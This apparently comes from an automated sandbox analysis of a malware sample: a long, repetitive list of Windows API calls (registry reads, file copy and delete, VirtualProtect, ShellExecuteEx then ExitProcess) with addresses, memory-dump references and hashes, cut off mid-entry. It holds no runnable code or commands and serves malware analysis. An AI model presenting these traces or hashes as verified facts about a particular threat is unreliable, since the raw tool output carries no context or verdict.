                                                        • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                        • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3466090806-0
                                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2151B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B21522
                                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B2153E
                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B2155C
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B21566
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction ID: 2f0465d66c1b8ad4530310e1796bdf42085243a7e50401e41db3efdccfba8c5f
                                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction Fuzzy Hash: 5C0131BDA40208BFDB10DFE4DC49FAEB7BDEB48701F008199FA0597280D6749A018F91
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041C74E
                                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                        • __getptd.LIBCMT ref: 0041C765
                                                        • __amsg_exit.LIBCMT ref: 0041C773
                                                        • __lock.LIBCMT ref: 0041C783
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                        • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                        • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                        • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                        APIs
                                                        • __getptd.LIBCMT ref: 00B3C9B5
                                                          • Part of subcall function 00B3C206: __getptd_noexit.LIBCMT ref: 00B3C209
                                                          • Part of subcall function 00B3C206: __amsg_exit.LIBCMT ref: 00B3C216
                                                        • __getptd.LIBCMT ref: 00B3C9CC
                                                        • __amsg_exit.LIBCMT ref: 00B3C9DA
                                                        • __lock.LIBCMT ref: 00B3C9EA
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00B3C9FE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                        • Instruction ID: 0b17c3f5730a5627eb416781a01212bc1913511647e6c7dfabb01a5e279a3f04
                                                        • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                        • Instruction Fuzzy Hash: C2F09032A407149BD722BBFC5807B1E3BE0AF00724F3203CAF514B61D2DB245940DB9A
                                                        APIs
                                                        • StrCmpCA.SHLWAPI(00000000,00826A08), ref: 0041079A
                                                        • StrCmpCA.SHLWAPI(00000000,008268D8), ref: 00410866
                                                        • StrCmpCA.SHLWAPI(00000000,00826958), ref: 0041099D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: `_A
                                                        • API String ID: 3722407311-2339250863
                                                        • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                        • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                        • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                        • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                        APIs
                                                        • StrCmpCA.SHLWAPI(00000000,00826A08), ref: 0041079A
                                                        • StrCmpCA.SHLWAPI(00000000,008268D8), ref: 00410866
                                                        • StrCmpCA.SHLWAPI(00000000,00826958), ref: 0041099D
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: `_A
                                                        • API String ID: 3722407311-2339250863
                                                        • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                        • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                        • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                        • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                        • ExitProcess.KERNEL32 ref: 00416755
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                        • String ID: <
                                                        • API String ID: 1148417306-4251816714
                                                        • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                        • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                        • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                        • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B368CA
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00B3698D
                                                        • ExitProcess.KERNEL32 ref: 00B369BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                        • String ID: <
                                                        • API String ID: 1148417306-4251816714
                                                        • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                        • Instruction ID: 4e19ed3b2bb0f1544fc3e0d009e20f44e958d59090a3ea1ba0912b662e1c10bb
                                                        • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                        • Instruction Fuzzy Hash: 85316DB1901208ABDB14EB90DD86FDEB7B8AF04300FA051C9F24576191EF746B88CF5A
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: @Jn@$Jn@$Jn@
                                                        • API String ID: 544645111-1180188686
                                                        • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                        • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                        • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                        • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                        APIs
                                                        • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                        • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcatlstrcpy
                                                        • String ID: vI@$vI@
                                                        • API String ID: 3905823039-1245421781
                                                        • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                        • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                        • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                        • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                        • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                        • wsprintfW.USER32 ref: 00418D78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocProcesswsprintf
                                                        • String ID: %hs
                                                        • API String ID: 659108358-2783943728
                                                        • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                        • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                        • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                        • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                        • String ID:
                                                        • API String ID: 257331557-0
                                                        • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                        • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                        • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                        • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2A548
                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00B2A666
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2A923
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2A9AA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                        • String ID:
                                                        • API String ID: 257331557-0
                                                        • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                        • Instruction ID: e9c0e0f59c2b66e2e98ec9a1e1e25c46040771c83e4609b965bda93dbaf1cf49
                                                        • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                        • Instruction Fuzzy Hash: 07E10272910118ABCB04FBA4DD92DEEB379AF15701F709199F196720A1EF346B48CF62
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                        • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                        • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                        • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2D6E8
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2D8FF
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2D913
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2D992
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                        • String ID:
                                                        • API String ID: 211194620-0
                                                        • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                        • Instruction ID: 9341116358c494c1cec591d54fa7fc7061f5c5701f869e48af5c7e10df73b813
                                                        • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                        • Instruction Fuzzy Hash: CA911472910114ABCB08FBA4DD96DEEB3B9AF15701F7051A9F146720A1EF346B48CF62
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
